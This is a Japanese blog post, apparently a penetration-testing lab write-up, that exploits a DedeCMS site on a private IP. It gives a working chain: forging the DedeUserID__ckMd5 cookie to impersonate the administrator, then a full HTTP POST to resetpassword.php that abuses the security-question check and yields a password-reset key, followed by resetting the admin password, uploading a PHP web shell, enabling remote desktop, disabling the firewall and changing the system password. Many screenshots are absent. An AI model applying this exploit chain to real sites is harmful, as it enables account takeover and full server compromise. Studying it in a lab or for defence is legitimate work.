banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

pte-実践dedecms

dedecms のバックエンドインターフェースは以下のようになります。

image

ディレクトリスキャンと robots.txt の内容は以下のようになりますが、利用できるものはありません。

image

バックエンドで弱いパスワードを試してもログインできません。フロントエンドアカウントを登録して、ユーザー名とパスワードを 0001/111111 に設定します。セキュリティの質問は入力しないでください。

登録が成功したら、http://10.1.10.62/member/index.php?uid=0001 にアクセスして以下の画面に移動します。

F12 キーを押してウェブ要素を表示し、last_vid__ckMd5 の値をコピーします。

last_vid__ckMd5 をコピーしたら、0001 アカウントでログインします。

image

Cookies Manager を開き、ウェブサイトの IP を検索します。

image

DedeUserID__ckMd5 の値を以前にコピーした last_vid__ckMd5 の内容に変更します。変更前の値は以下のようになります。

image

変更後は以下のようになります。

image

DedeUserID を 0001 に変更し、2 つの値を変更したら、Refresh をクリックして閉じます。

image

ページを更新すると、管理者ユーザーになります。

image

http://10.1.10.62/member/resetpassword.php にアクセスし、次のパケットを送信します。

POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

dopost=safequestion&safequestion=0.0&safeanswer=&id=1

image

レスポンスパケットのこのリンクに注意してください。

image

コピーしてください。

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

amp; を削除します。

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

ブラウザでアクセスします。

パスワードを変更するページに直接移動します。

image

パスワードを 666666 に設定します。

これはフロントエンドの admin ユーザーのパスワードです。次にバックエンドのユーザー名のパスワードを変更する必要があります。

アクセス:

http://10.1.10.62/member/edit_baseinfo.php

プロフィールの完了ページに移動し、完了ボタンをクリックします。

image

再度、http://10.1.10.62/member/edit_baseinfo.php にアクセスすると、以下のページに移動します。

image

元のパスワードは 666666 で、新しいパスワードを 888888 に変更し、キャプチャとメールアドレスを入力して更新します。

バックエンドにアクセスし、admin/888888 でログインします。ログインに成功しました。

image

次はバックエンドでのシェルのアップロードです。

ファイルマネージャーに移動し、新しいファイルを作成します。

image

ファイル名は s.php で、シェルを書きます。

image

ファイルは以下のようになります:

image

蚁剣の Base64 エンコードリンク

image

image

3389 が開いていない場合は、ツールパッケージに含まれる vbs スクリプトをアップロードしてポートを開くことができます。

image

ファイアウォールを無効にします。

image

管理者のパスワードを変更します。

image

リモートデスクトップでログインします。

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。